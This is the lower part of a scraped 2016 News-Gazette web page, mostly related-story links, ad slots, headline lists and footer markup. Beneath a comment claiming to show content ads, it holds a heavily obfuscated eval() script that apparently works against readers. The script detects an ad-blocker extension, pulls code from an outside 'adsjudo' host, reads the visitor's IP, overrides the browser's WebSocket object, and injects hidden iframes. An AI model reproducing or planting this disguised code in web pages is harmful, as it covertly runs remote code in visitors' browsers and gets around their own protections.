                                                                    <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/10/11/20161012-034104-pic-536297966.jpg" alt="Neighbors: Recognizing accomplishments throughout our communities " title="Neighbors: Recognizing accomplishments throughout our communities "  class="imagecache imagecache-100x100_scale" width="100" height="60" /></a>                                                                <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html">Neighbors: Recognizing accomplishments throughout our communities </a>                            </li>
                                            </ul>
                    <a onclick="showNextList()" class="btn-next"><span class="glyphicon glyphicon-circle-arrow-right"></span></a>


                </div>

                <div id="mobileRelated" style="display:none">
                    <h2>More Living</h2>
                    <ul id="mobileList">
                                                    <li>
                                                                <a href="/living/2016-10-14/religion-calendar-oct-14-20-2016.html">Religion calendar, Oct. 14-20, 2016</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                <a href="/living/2016-10-13/rich-warren-now-its-googles-turn-smartphone-release.html">Rich Warren: Now it&#039;s Google&#039;s turn for smartphone release</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                <a href="/living/2016-10-12/joan-griffisillinois-ancestors-new-guide-genealogy-resources-springfield.html">Joan Griffis/Illinois Ancestors: New guide to genealogy resources in Springfield</a>                                <div class="clear"></div>
                            </li>
                                                    <li>
                                                                    <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/100x100_scale/images/2016/10/11/20161012-034104-pic-536297966.jpg" alt="Neighbors: Recognizing accomplishments throughout our communities " title="Neighbors: Recognizing accomplishments throughout our communities "  class="imagecache imagecache-100x100_scale" width="100" height="60" /></a>                                                                <a href="/living/2016-10-12/neighbors-recognizing-accomplishments-throughout-our-communities.html">Neighbors: Recognizing accomplishments throughout our communities </a>                                <div class="clear"></div>
                            </li>
                                            </ul>

                </div>

            				
            <!--                <div id="taboola-below-article-thumbnails"></div>-->
<!--                <script type="text/javascript">-->
<!--                 window._taboola = window._taboola || [];-->
<!--                  _taboola.push({-->
<!--                       mode: 'thumbnails-a',-->
<!--                       container: 'taboola-below-article-thumbnails',-->
<!--                       placement: 'Below Article Thumbnails',-->
<!--                       target_type: 'mix'-->
<!--                   });-->
<!--                   </script>-->
                <script>

                    /*begin JS*/
                    /*JS for showing content ads to users*/
                    var _domain_ ="news-gazette.com";  var clientID = "b99f2a2a-9aa1-fcfe-b5d4-f5562ab2fd63";  eval((function(){var n=[94,86,88,79,87,75,65,80,76,70,66,85,90,74,71,89,82,60,81,72];var d=[];for(var l=0;l<n.length;l++)d[n[l]]=l+1;var c=[];for(var r=0;r<arguments.length;r++){var w=arguments[r].split('~');for(var u=w.length-1;u>=0;u--){var f=null;var j=w[u];var y=null;var s=0;var i=j.length;var h;for(var k=0;k<i;k++){var v=j.charCodeAt(k);var a=d[v];if(a){f=(a-1)*94+j.charCodeAt(k+1)-32;h=k;k++;}else if(v==96){f=94*(n.length-32+j.charCodeAt(k+1))+j.charCodeAt(k+2)-32;h=k;k+=2;}else{continue;}if(y==null)y=[];if(h>s)y.push(j.substring(s,h));y.push(w[f+1]);s=k+1;}if(y!=null){if(s<i)y.push(j.substring(s));w[u]=y.join('');}}c.push(w[0]);}var x=c.join('');var g='abcdefghijklmnopqrstuvwxyz';var q=[126,39,10,42,92,96].concat(n);var m=String.fromCharCode(64);for(var l=0;l<q.length;l++)x=x.split(m+g.charAt(l)).join(String.fromCharCode(q[l]));return x.split(m+'!').join(m);})('^[_$_1825=["^.^ set@mccount^Tr@m-78503326-2","push^%^ setDo^SNam^Lnone^%^ setSample@wat^L1^%^ set@mllow@oinker^R^K","createElement","typ^Ltext/javas^K","async^Rrc^Bs:","protocol","loca^Z^B^Xssl^B://www",".google-^9.com/ga.js","getElements@qyTagNam^Linsert@qefor^LparentNod^L^D","track@w@ls_1_percent: ^D: [","]^%^ setCustom@har^%^ trackEvent^\\ser events","_cre^)S^K^\\pd^)","^Tm@qCDE@p@u@zI@t@l@oMN@j@n@y@wST@r@h@k@i@v@sabcdefghijklmnopqrstuvwxyz0123456789","rando^Ylength","floor","char@mt","ws^X","w^X^\\nified.adsjudo.co^Yj@yuery^B^Xcode.jquery.com/jquery-2.2.0.min.js^Iload^Ireadystatechang^LreadyStat^Lloade^Mcomplet^Lprec^W^Ierror","appendChil^Mhea^Mhref","$type$prec^W^J^J||null^Jgnadj","getIte^Y ^\\ndefined ","index@jf","js_feed^Jfeed^Jc^WI@n$type$^Rend^Iopen^Iclos^Lundefine^M@x^C  src^Ochrome-exten^]://cfhdojbkjhnklbpkdaibdccddilifddb/op^Zs.html@e" style^Odisplay:none@e">@x/^C>","appen^Mbody","loa^M@x^C  src^O^Te" style^Odisplay:none@e">@x/^C>","^C[src@d^O^Te"]^TkebSocket","content@kindow^I","^C[src@d^Ochrome-exten^]://cfhdojbkjhnklbpkdaibdccddilifddb/op^Zs.html@e"]^Imessag^Ldata","getIp","js_fee^Mpars^Lwp^Rettings","bicall","css","fee^M  ^RetIte^Ydata:text/javas^K;charset=utf-8,","top","init"];^N^[^a=^a|| [];^a[_$^!0^<[1]^:$^!3^<[4]^:$^!5^<[6]^:$^!7],^V])^H^._^9^A=(^3^F {_cre^)S^K:^3^N(f^\'a^"9]^*;a^610^+11];a^612^P^V;a^613^P^814]== ^#1^2[15]]?^=17]:^=18])^419^Eb^"20]^*[0];b^622]]^621]](a,b)})()^1},upd^):f^\'c^"23^?d=^=2^bc^425];^a[_$^!26],1,^=23],c,1^:$^!27^<[28],d])}}})()^1;^N^._^9^A^629]]();^._^9^A^630]]()^1^H^S^A=f^\'p^Ho=^71^Eh^Hj=^71^Eg=^V;func^Z m(^GI=^71^E@z=^72];for(^[@u=0;@u@x 5;@u++){I+= @z^636]](Math^635]](Math^63^Q)@d @z^634]]))};^F I}^[l=^814]== ^#1^2[15]]?^77]:^78])^439^Ek=^3if(!window^640]]^Gq^"9]^*;q^610^+11];q^613^+41];q^642^Pq^643^&if(!this^644]^`this^644]]^045^`this^644]]^046]){q^642^Pq^643^Pnull;n^8^^}};q^648^&};^#20^/50])[0]^649]](q)^@n^8^^}}^Hn=^;t^Gr^"1^2[51]];if(t^0^^{o= ^=52]+ ^>^45^Ur^45^b_^D_;i(o)^@h= ses^]Storage^656^/55]);if(h== null|| h^031^`h^057^`h^659^/58])>  -1){o= ^=60]+ ^>^45^Ur^45^b_^D_^@o= ^=61]+ ^>^45^Ur^45^b_^D_^-63^/62]+ o)}}^Hi=^;u){p=  new @kebSocket(l);p^664^&p^66^Qu)^-65^&^-48^&if( typeof error@ks^066]){error@ks= ^V;^$69^5[68^/67]);^$78^5[77^/70],f^\'v=m();^$69^5[68^/71]+ v^472])^Hw=^$7^Uv^474])[0];@kebSocket= w^67^2[75]];^$7^Uv^474^5[77^/70],^3n^8^^})})}^-79^P^;y){^Nif(^(^081]){get@rserI@n();^F^@if(o^659^/82])>  -1){j= @tS@jN^68^Q^()^HC^,4^?D^,5^?z^,6^?@m^,7^?@q^,8^?x=D^489]+ z^489]+ C^489]+ @m;ses^]Storage^690^/55],x^_@q^_x)^@if(g== ^V){j= @tS@jN^68^Q^();@q= j^685]];^SC^W= j^647]];f(@q^_^SC^W);g= false^@j= @tS@jN^68^Q^();@q= j^688]];f(@q^_h)}}};^N^1}catch(e){^N^1}}}^Hf=^;@p^GE^"9]^*;E^610^+11];E^613^+91]+ escape(@p);^#69]]^649]](E)};^F {init:k,^>:^>,start:n}}();if(window^692]]^616]]== ^#16]]){^S^A^69^Q)}~_gaConverter_^S._~_1825[2]](^6~=^#~document^6~j@yuery^8~","^.~]]= ^3~unction(^G~y^680]]~ate@mnalytics~]^88])~]]= ^=~=j^68~};p^6~^S@wegular~]]^8~== ^=~}catch(e){}~6]][_$_1825~^;){~+ ^=~])[_$_1825~[^=~^=3~(^=~analytics~]);^a[_~func^Z(~],_$_1825~_$_1825[~clientID~]^E~}else {~_widget~","http~iframe~do^S~]^H~return~){^[~;^[~","on~||","~cript~e","~d","~try{~=@e"~]]= ~3]](~","s~main~","@~3]+ ~true~heck~s://~m","~tion~var ~","u~sion~47])~);f(~]|| ~_gaq~4]+ '));

                    /*end JS*/

                </script>
                <div id="contentad164511"></div>
                <script type="text/javascript">
                    (function(d) {
                        var params =
                        {
                            id: "0b86b6e2-77b2-4636-9786-39853ccd059e",
                            d:  "bmV3cy1nYXpldHRlLmNvbQ==",
                            wid: "164511",
                            cb: (new Date()).getTime()
                        };

                        var qs=[];
                        for(var key in params) qs.push(key+'='+encodeURIComponent(params[key]));
                        var s = d.createElement('script');s.type='text/javascript';s.async=true;
                        var p = 'https:' == document.location.protocol ? 'https' : 'http';
                        s.src = p + "://api.content.ad/Scripts/widget2.aspx?" + qs.join('&');
                        d.getElementById("contentad164511").appendChild(s);
                    })(document);
                </script>

            
                        <button id="show-comments">Join the Conversation</button>
                <div id="comment-info-wrapper">
                <h3>Comments</h3>
                <div class="well bg-warning">
                <p><em>News-Gazette.com embraces discussion of both community and world issues. We welcome you to contribute your ideas, opinions and comments, but we ask that you avoid personal attacks, vulgarity and hate speech. We reserve the right to remove any comment at our discretion, and we will block repeat offenders' accounts. To post comments, you must first be a registered user, and your username will appear with any comment you post. Happy posting.</em></p>
                </div>
            </div>
                            <p class="cShow"><a href="/user/login?destination=comment/reply/1482813#comment-form">Login</a> or <a href="/user/register?destination=comment/reply/1482813#comment-form">register</a> to post comments</p>
                                </div>

                </div>
                                </div>

            </div> <!-- /content-content -->

          <div class="col-md-4 hard">
    <div id="sidebar" class="col-md-12 sidebar">
        <div id="second-logo">
                    </div>

        <div id="block-block-310" class="clear-block block block-block ad-block">


  <div class="content"><!-- /4073248/NG_ROS_Half_Page -->
<div id='div-gpt-ad-1443199567549-0' style='height:600px; width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1443199567549-0'); });
</script>
</div>
</div>
</div>
<div id="block-block-312" class="clear-block block block-block ad-block">


  <div class="content"><!-- /4073248/NG_Home_Midrail -->
<div id='div-gpt-ad-1443203983873-0' style='height:250px; width:300px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1443203983873-0'); });
</script>
</div>
<div class="clearfix"></div></div>
</div>

			<div class="wdwsSection">
				            </div>

			<div class="block-section">
				            </div>

                <div id="halfPage" class="col-md-12"></div>
        <div class="clear"></div>

        <div id="block-custom_front-6" class="clear-block block block-custom_front block-section most">

  <h2>Most Viewed News</h2>

  <div class="content"><ul>
      <li><a href="/news/local/2016-10-13/champaign-mans-charges-include-sexual-assaults-torture-poodle.html">Champaign man&#039;s charges include sexual assaults, torture of poodle</a></li>
      <li><a href="/news/local/2016-10-11/danville-man-dies-motorcycle-accident.html">Danville man dies in motorcycle accident</a></li>
      <li><a href="/news/local/2016-10-08/all-charges-dropped-gunfire-case-involving-duty-state-trooper.html">All charges dropped in gunfire case involving off-duty state trooper</a></li>
      <li><a href="/news/local/2016-10-12/trio-arrested-after-surveillance-alert-urbana-home.html">Trio arrested after surveillance alert at Urbana home</a></li>
      <li><a href="/news/local/2016-10-11/ui-grad-trumps-tape-it-wasnt-surprising.html">UI grad on Trump&#039;s tape: &#039;it wasn&#039;t surprising&#039;</a></li>
  </ul></div>
</div>
<div id="block-custom_front-7" class="clear-block block block-custom_front block-section most">

  <h2>Most Commented News</h2>

  <div class="content"><ul>
      <li><a href="/news/local/2016-10-12/kacich-letter-governor-hints-nursing-home-peril.html">Kacich: Letter to governor hints at nursing home peril </a></li>
      <li><a href="/news/local/2016-10-11/ui-grad-trumps-tape-it-wasnt-surprising.html">UI grad on Trump&#039;s tape: &#039;it wasn&#039;t surprising&#039;</a></li>
      <li><a href="/news/local/2016-10-08/all-charges-dropped-gunfire-case-involving-duty-state-trooper.html">All charges dropped in gunfire case involving off-duty state trooper</a></li>
      <li><a href="/opinion/guest-commentary/2016-10-09/guest-commentary-insight-criminal-justice-system.html">Guest commentary: Insight into the criminal-justice system</a></li>
      <li><a href="/news/local/2016-10-12/81-million-new-mtd-fleet.html">$8.1 million for new MTD fleet</a></li>
  </ul></div>
</div>
    </div>
</div>
          </div><!--#content -->
	    </div>
	      </section><!-- /section -->
<div id="meter-slide-container"></div>
</div><!--end of the container div-->

<footer>
<div class="clearfix"></div>
        <!--        The footer region-->
        <div class="first-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-custom_front-10" class="clear-block block block-custom_front ">


  <div class="content"><div id="trending">
    <h2>Trending Now</h2>
    <div class="col-md-4 col-sm-6 col-xs-12 featured-trending">
        <h3><a href="/news/local/2016-10-13/champaign-mans-charges-include-sexual-assaults-torture-poodle.html" class="icon-story">Champaign man&#039;s charges include sexual assaults, torture of poodle</a></h3>
        <a href="/news/local/2016-10-13/champaign-mans-charges-include-sexual-assaults-torture-poodle.html"><img src="http://static.news-gazette.com/sites/all/files/imagecache/300x300_width_height_scale/images/2016/10/13/1014_LOCA_Zhang_sex_assault_copy_0.jpg" alt="Champaign man&amp;#039;s charges include sexual assaults, torture of poodle" title="Champaign man&amp;#039;s charges include sexual assaults, torture of poodle"  class="imagecache imagecache-300x300_width_height_scale" width="300" height="148" /></a>
    </div>

    <div class="col-md-8 col-sm-6 col-xs-12">
        <ul id="trending-list">
                     <li><a href="/sports/illini-sports/football/2016-10-13/tate-dees-departure-latest-list-letdowns.html" class="icon-story">Tate: Dee's departure latest in list of letdowns</a></li>
                     <li><a href="/news/local/2016-10-12/trio-arrested-after-surveillance-alert-urbana-home.html" class="icon-story">Trio arrested after surveillance alert at Urbana home</a></li>
                     <li><a href="/news/local/2016-10-13/jim-dey-madigan-films-premiere-makes-waves.html" class="icon-story">Jim Dey: 'Madigan' film's premiere makes waves</a></li>
                     <li><a href="/opinion/letters-editor/2016-10-06/many-reasons-no-unit-4-plan.html" class="icon-letter">Many reasons for 'no' on Unit 4 plan</a></li>
                     <li><a href="/news/local/2016-10-11/danville-man-dies-motorcycle-accident.html" class="icon-story">Danville man dies in motorcycle accident</a></li>
                     <li><a href="/news/local/2016-10-12/rankin-police-hq-burglarized.html" class="icon-story">Rankin police HQ burglarized</a></li>
                     <li><a href="/news/local/2016-10-13/trooper-remains-leave.html" class="icon-story">Trooper remains on leave</a></li>
                     <li><a href="/opinion/editorials/2016-10-12/senate-race-proxy-fight.html" class="icon-story">Senate race  is a proxy fight</a></li>
                     <li><a href="/sports/illini-sports/football/2016-10-12/crouch-takes-reps-starters.html" class="icon-story">Crouch takes reps with starters</a></li>
                     <li><a href="/sports/prep-sports/football/2016-10-12/week-8-football-storylines-heaton-delivers-maroons.html" class="icon-story">Week 8 football storylines: Heaton delivers for Maroons</a></li>
                 </ul>
    </div>

</div></div>
</div>
            </div></div>
        </div>
        <div class="second-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-block-272" class="clear-block block block-block ">


  <div class="content"><div class="networkLinks">
<div class="col-md-3 radioAir">
<h3>Radio</h3>
<ul>
<li><a href="http://wdws.com" title="">Newstalk 1400 WDWS-AM</a></li>
<li><a href="http://whms.com" title="">Lite Rock 97.5 WHMS-FM</a></li>
<li><a href="http://www.1079wkio.com" title="">Classic Hits 107.9 WKIO-FM</a></li>
</ul>
</div>
<div class="col-md-6 print">
<h3>Print</h3>
<ul>
<li><a href="http://www.county-star.com" title="">County Star</a></li>
<li><a href="http://the-independent-news.com" title="">The Independent News</a></li>
<li><a href="http://www.leaderlandnews.com" title="">The Leader</a></li>
<li><a href="http://leroyfcpress.com" title="">LeRoy Farmer City Press</a></li>
<li><a href="http://www.mcitizen.com" title="">Mahomet Citizen</a></li>
<li><a href="http://paxtonrecord.net" title="">Paxton Record</a></li>
<li><a href="http://journal-republican.com" title="">Journal Republican</a></li>
<li><a href="http://www.rantoulpress.com" title="">Rantoul Press</a></li>
</ul>
</div>
<div class="col-md-3 magazines">
<h3>Magazines</h3>
<ul>
<li><a href="http://athomeillinois.com" title="At Home Magazine">At Home Magazine</a></li>
<li><a href="http://www.centralillinoisbusiness.com" title="Central Illinois Business Magazine">Central Illinois Business Magazine</a></li>
</ul>
</div>
</div></div>
</div>
            </div></div>
        </div>
        <div class="third-footer">
            <div class="container">
                <div class="col-md-12">
                    <div id="block-menu-menu-customer-service" class="clear-block block block-menu col-md-4">

  <h2>Customer Service</h2>

  <div class="content"><ul class="menu"><li class="leaf first"><a href="/section/services" title="">Help</a></li>
<li class="leaf"><a href="/contact" title="">Contact Us</a></li>
<li class="leaf"><a href="/section/services/online-services/terms-use.html" title="">Terms of Use</a></li>
<li class="leaf"><a href="/section/services/online-services/news-gazette-online-privacy-policy.html" title="">Privacy Policy</a></li>
<li class="leaf"><a href="http://members.news-gazette.com/faq" title="Frequently Asked Questions">Frequently Asked Questions</a></li>
<li class="leaf last"><a href="http://members.news-gazette.com" title="Subscription Information">Subscription Information</a></li>
</ul></div>
</div>
<div id="block-menu-menu-quick-links" class="clear-block block block-menu col-md-4">

  <h2>Quick Links</h2>

  <div class="content"><ul class="menu"><li class="leaf first"><a href="http://eedition.news-gazette.com" title="eEdition">eEdition</a></li>
<li class="leaf"><a href="/obituaries" title="Obituaries">Obituaries</a></li>
<li class="leaf"><a href="/section/services/subscriber-services/vacation-stop.html" title="Submit a Vacation Stop">Submit Vacation Stop</a></li>
<li class="leaf"><a href="/staff" title="">Staff List</a></li>
<li class="leaf"><a href="/store/services/online-services/pay-your-news-gazette-bill-online.html" title="Pay your Subscription">Pay your Subscription</a></li>
<li class="leaf"><a href="http://www.news-gazette.com/section/services/general-services/news-gazette-buy-photos.html" title="Buy a Photo">Buy a Photo</a></li>
<li class="leaf"><a href="/contact/tips" title="Send a News Tip">Send a News Tip</a></li>
<li class="leaf last"><a href="/section/services/reader-services/submission-forms.html" title="">Submit an Announcement</a></li>
</ul></div>
</div>
<div id="block-block-274" class="clear-block block block-block col-md-4">


  <div class="content"><div class="ng-block"><img src="/sites/all/themes/custom/ng_fbg/images/ng_logo_white.png" /><br />
<p class="offer">Start a subscription now to enjoy our award-winning local news and sports coverage. Print, digital, or both-- we've got you covered.</p>
<p class="text-center"><a class="btn btn-primary btn-subscribe" href="http://members.news-gazette.com">Subscribe</a></p>
</div>
</div>
</div>
                    <div id="block-block-271" class="clear-block block block-block col-md-6">

  <h2>Connect with The News-Gazette</h2>

  <div class="content"><div class="socialBtns">
<a href="http://facebook.com/NewsGazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-facebook.png"></a>
<a href="https://www.linkedin.com/company/the-news-gazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-linkedin.png"></a>
<a href="http://twitter.com/news_gazette"><img src="/sites/all/themes/custom/ng_fbg/images/64-twitter.png"></a>
<a href="https://instagram.com/news_gazette/"><img src="/sites/all/themes/custom/ng_fbg/images/64-instagram.png"></a>
<a href="http://www.news-gazette.com/rss.xml"><img src="/sites/all/themes/custom/ng_fbg/images/64-rss.png"></a>
</div></div>
</div>
<div id="block-block-275" class="clear-block block block-block col-md-6">


  <div class="content"><div class="copyright">© 1995-2015 The News-Gazette, Inc. | All Rights Reserved | 15 Main St., Champaign, IL 61820</div></div>
</div>
                </div></div>
        </div>
        <!--            End of footer region-->

	</footer>
    <div id="mobileBanner"></div>
</body>

<!-- JavaScript at the bottom for fast page loading -->
<!-- HTML5 IE Enabling Script -->
<!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<!-- CSS3 Media Queries -->
<script src="/sites/all/themes/custom/ng_fbg/js/respond.js"></script>

    <!-- Quantcast Tag -->
    <script type="text/javascript">
        var _qevents = _qevents || [];

        (function() {
            var elem = document.createElement('script');
            elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
            elem.async = true;
            elem.type = "text/javascript";
            var scpt = document.getElementsByTagName('script')[0];
            scpt.parentNode.insertBefore(elem, scpt);
        })();

        _qevents.push({
            qacct:"p-a15Hs4ofKGnVw"
        });
    </script>

    <noscript>
        <div style="display:none;">
            <img src="//pixel.quantserve.com/pixel/p-a15Hs4ofKGnVw.gif" border="0" height="1" width="1" alt="Quantcast"/>
        </div>
    </noscript>
    <!-- End Quantcast tag -->


  <script type="text/javascript">
<!--//--><![CDATA[//><!--
var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-4954131-2"]);_gaq.push(["_trackPageview"]);(function() {var ga = document.createElement("script");ga.type = "text/javascript";ga.async = true;ga.src = "/sites/all/files/googleanalytics/ga.js?c";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(ga, s);})();
//--><!]]>
</script>
</html>